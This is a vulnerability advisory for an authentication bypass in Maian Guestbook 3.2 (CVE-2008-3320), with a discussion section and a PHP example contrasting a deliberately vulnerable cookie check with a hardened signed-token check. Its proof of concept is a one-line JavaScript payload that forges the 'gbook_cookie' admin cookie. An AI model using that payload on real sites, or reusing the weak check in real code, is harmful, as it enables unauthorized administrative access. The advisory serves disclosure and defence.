Maian Guestbook 'gbook_cookie' Authentication Bypass Vulnerability
BID:30203
Info
| Bugtraq ID: | 30203 |
| Class: | Design Error |
| CVE: | CVE-2008-3320 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 13 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | S.W.A.T. |
| Vulnerable: | Maian Script World Maian Guestbook 3.2 |
| Not Vulnerable: | |
Discussion
Maian Guestbook is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application.
This issue affects Maian Guestbook 3.2 and prior versions.
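The flaw class described above, shown as a hypothetical vulnerable check beside a hardened one. This is an added example, not Maian Guestbook's actual source: only the cookie name `gbook_cookie` comes from the advisory, while the function names, the token format and the key handling are assumptions.

```php
<?php
// Hypothetical vulnerable check (not Maian Guestbook's source): the cookie
// value alone is treated as proof of an admin login, and the client sets it.
function is_admin_vulnerable(array $cookies): bool
{
    return isset($cookies['gbook_cookie']) && $cookies['gbook_cookie'] == '1';
}

// Hardened form (assumed design): the cookie holds "expiry.nonce.mac", where
// mac is an HMAC-SHA256 over "expiry.nonce" under a server-only key.
function issue_admin_token(string $key, int $ttl = 1800): string
{
    $payload = (time() + $ttl) . '.' . bin2hex(random_bytes(16));
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

function is_admin_hardened(array $cookies, string $key): bool
{
    $token = $cookies['gbook_cookie'] ?? '';
    if (!is_string($token)) {
        return false; // rejects array-valued cookies such as gbook_cookie[]=1
    }
    $parts = explode('.', $token);
    if (count($parts) !== 3) {
        return false;
    }
    [$expiry, $nonce, $mac] = $parts;
    $expected = hash_hmac('sha256', $expiry . '.' . $nonce, $key);
    if (!hash_equals($expected, $mac)) {
        return false; // constant-time comparison; forged or altered token
    }
    return ctype_digit($expiry) && (int) $expiry >= time();
}

// Constructed sample cookies; in the application these come from $_COOKIE.
$key = random_bytes(32); // assumption: loaded from server-side config in practice
$samples = [
    'client-set value' => ['gbook_cookie' => '1'],
    'issued token'     => ['gbook_cookie' => issue_admin_token($key)],
    'expired token'    => ['gbook_cookie' => issue_admin_token($key, -60)],
];
foreach ($samples as $label => $cookies) {
    printf("%-17s vulnerable=%s hardened=%s\n", $label,
        var_export(is_admin_vulnerable($cookies), true),
        var_export(is_admin_hardened($cookies, $key), true));
}
```

A stateless signed token cannot be revoked before its expiry; a server-side session store keyed by a random identifier is the alternative when logout must take effect immediately.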
Exploit / POC
Attackers can exploit this issue via a browser.
The following example JavaScript code to create a cookie is available:
javascript:document.cookie = "gbook_cookie=1; path=/";
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- Maian Weblog Homepage (Maian Script World)